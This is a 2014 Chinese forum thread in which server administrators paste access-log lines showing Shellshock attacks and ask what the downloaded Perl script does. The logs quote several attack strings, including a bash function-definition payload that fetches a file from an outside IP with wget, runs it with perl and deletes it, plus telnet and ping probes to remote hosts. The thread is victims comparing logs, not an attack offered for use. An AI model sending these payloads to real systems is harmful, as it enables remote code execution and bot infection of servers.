这是一个创建于 3505 天前的主题,其中的信息可能已经有所发展或是发生改变。
看到了一条日志记录:
74.201.85.77 - - [26/Sep/2014:07:35:27 +0000] "GET / HTTP/1.0" 403 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
然后我登录了 http://208.118.61.44/wow1 这个文件,吓尿了。。。有perl大神能告诉我这个脚本是干啥的吗?
74.201.85.77 - - [26/Sep/2014:07:35:27 +0000] "GET / HTTP/1.0" 403 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
然后我登录了 http://208.118.61.44/wow1 这个文件,吓尿了。。。有perl大神能告诉我这个脚本是干啥的吗?
 |
1
20150517 2014-09-26 19:28:48 +08:00 via Android
中马了
|
 |
2
LazyZhu 2014-09-26 19:33:11 +08:00
http://193.2.50.126/stuff/linux/dbot.txt
|
 |
3
kingwkb 2014-09-26 20:16:46 +08:00
检查了下,的确有
54.251.83.67 - - [26/Sep/2014:13:42:09 +0800] "GET / HTTP/1.1" 200 2664 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a" 74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET / HTTP/1.0" 200 2664 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" 74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /test-cgi/test.sh HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" 74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /cgi-bin/test.sh HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" 74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /cgi-bin/php HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" |
 |
4
xd547 2014-09-26 20:19:42 +08:00
貌似我的也被扫描了
$ sudo cat * |grep bash 209.126.230.72 - - [25/Sep/2014:14:10:39 +0800] "GET / HTTP/1.0" 301 178 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" 114.91.107.58 - - [26/Sep/2014:00:54:00 +0800] "GET / HTTP/1.1" 301 178 "-" "() { :;}; /bin/bash -c \x22telnet 197.242.148.29 9999\x22" 198.46.135.194 - - [26/Sep/2014:03:15:06 +0800] "GET / HTTP/1.0" 301 178 "() { :; }; ping -c 3 198.46.158.94" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" |
 |
5
janxin 2014-09-26 20:51:48 +08:00
看起来就是执行了个后门perl...
|
 |
6
arcas 2014-09-26 20:53:25 +08:00
E486: 找不到模式: bash
|
 |
7
binux 2014-09-26 20:56:48 +08:00
74.201.85.67 - - [26/Sep/2014:14:37:00 +0400] "GET /cgi-bin/test.sh HTTP/1.0" 500 192 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" "-"
也有,还是个相近的ip |
|
8
binux 2014-09-26 21:01:33 +08:00
还有人干这个。。
209.126.230.72 - - [25/Sep/2014:10:24:48 +0400] "GET / HTTP/1.0" 500 192 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" "-" |
 |
9
fanta 2014-09-27 01:34:54 +08:00
那个服务器好像关了,wow1不能访问了.
|
 |
10
chijiao 2014-09-27 10:17:27 +08:00
我的也被扫描了,我的解决方案是用squid做代理
|
 |
11
sorcerer 2014-09-28 11:11:05 +08:00
我也被执行过这个脚本,能告诉我具体脚本做了啥吗.好有相应动作.
|
Select Language